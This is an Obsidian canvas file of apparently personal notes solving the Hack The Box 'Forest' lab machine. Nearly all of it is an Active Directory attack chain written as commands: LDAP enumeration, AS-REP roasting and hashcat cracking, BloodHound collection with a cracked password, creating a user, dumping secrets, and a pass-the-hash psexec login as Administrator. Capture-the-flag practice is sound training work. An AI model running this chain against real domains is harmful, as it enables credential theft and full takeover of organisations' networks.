{
	"nodes":[
		{"id":"49516c6a7d075277","type":"file","file":"forest/attachments/Pasted image 20250204182555.png","x":-240,"y":-40,"width":399,"height":235},
		{"id":"f75bad15b2711c10","type":"text","text":"FOREST.htb.local\nhtb.local","x":-540,"y":48,"width":250,"height":60},
		{"id":"d70ce893c84b175e","type":"text","text":"```\n┌──(kali㉿kali)-[~/HackTheBox/forest]\n└─$ ldapsearch -H ldap://htb.local:389/ -x -s base -b ''  \"(objectClass=*)\" \"*\" + \n```","x":-415,"y":260,"width":1000,"height":140},
		{"id":"b15c2828253a7ab8","type":"text","text":"```\nldapsearch -x -H ldap://htb.local -D 'CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local' -W -b 'DC=htb,DC=local' 'objectClass=user' 'samaccountname'\n```","x":-415,"y":460,"width":1000,"height":112},
		{"id":"8220565f3b4c7284","type":"text","text":"https://www.geeksforgeeks.org/ldap-enumeration/","x":673,"y":484,"width":250,"height":60},
		{"id":"c97f531f31649de6","type":"text","text":"nmap","x":-200,"y":-220,"width":250,"height":60},
		{"id":"38ee0b83513605a8","type":"text","text":"https://notes.benheater.com/books/active-directory/page/ldapsearch","x":673,"y":572,"width":250,"height":60},
		{"id":"55c04213aad80392","type":"text","text":"445","x":1520,"y":-220,"width":250,"height":60},
		{"id":"bf53d5491b0d364c","type":"file","file":"forest/attachments/Pasted image 20250204211244.png","x":1520,"y":-120,"width":400,"height":306},
		{"id":"fe12cce405f5028a","type":"text","text":"asreproast\nimpacket-GetNPUsers -usersfile users_rpcclient -request -format hashcat -outputfile reps -dc-ip htb.local 'htb.local/'\n","x":1520,"y":320,"width":900,"height":60},
		{"id":"7931c1d796f51d6a","type":"file","file":"forest/attachments/Pasted image 20250204211858.png","x":1520,"y":427,"width":400,"height":235},
		{"id":"9d48b9dcd09e3fea","type":"text","text":"hashcat -m 18200 asreproastables.txt /usr/share/wordlists/rockyou.txt","x":1520,"y":740,"width":768,"height":60},
		{"id":"d4483f5841044e6c","type":"file","file":"forest/attachments/Pasted image 20250204212119.png","x":1520,"y":840,"width":399,"height":234},
		{"id":"abda51a54d925b3f","type":"text","text":"bloodhound-python -c all -d htb.local -gc htb.local -dc forest.htb.local -ns 10.10.10.161 -u svc-alfresco -p 's3rvice' --disable-autogc --zip","x":1480,"y":1200,"width":1054,"height":60},
		{"id":"9f8e5edc0a6aad84","type":"file","file":"forest/attachments/Pasted image 20250204213151.png","x":1480,"y":1340,"width":400,"height":108},
		{"id":"1c612acd0563155d","type":"file","file":"forest/attachments/Pasted image 20250204213334.png","x":1480,"y":1700,"width":400,"height":40},
		{"id":"ab7a4ea25d9d9c3f","type":"text","text":"net user john johnjohn","x":1480,"y":1580,"width":250,"height":60},
		{"id":"0393f1467430696d","type":"file","file":"forest/attachments/Pasted image 20250204213517.png","x":1480,"y":1920,"width":399,"height":173},
		{"id":"7becef30f890d3c0","type":"text","text":"impacket-secretsdump 'htb.local'/'john':'johnjohn'@htb.local","x":1480,"y":1820,"width":570,"height":60},
		{"id":"3c06baf2a6b0efbe","type":"file","file":"forest/attachments/Pasted image 20250204213729.png","x":1480,"y":2240,"width":400,"height":188},
		{"id":"f2e9ad02ba99a1f2","type":"text","text":"impacket-psexec htb.local/Administrator@htb.local -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6","x":1480,"y":2140,"width":1106,"height":60}
	],
	"edges":[]
}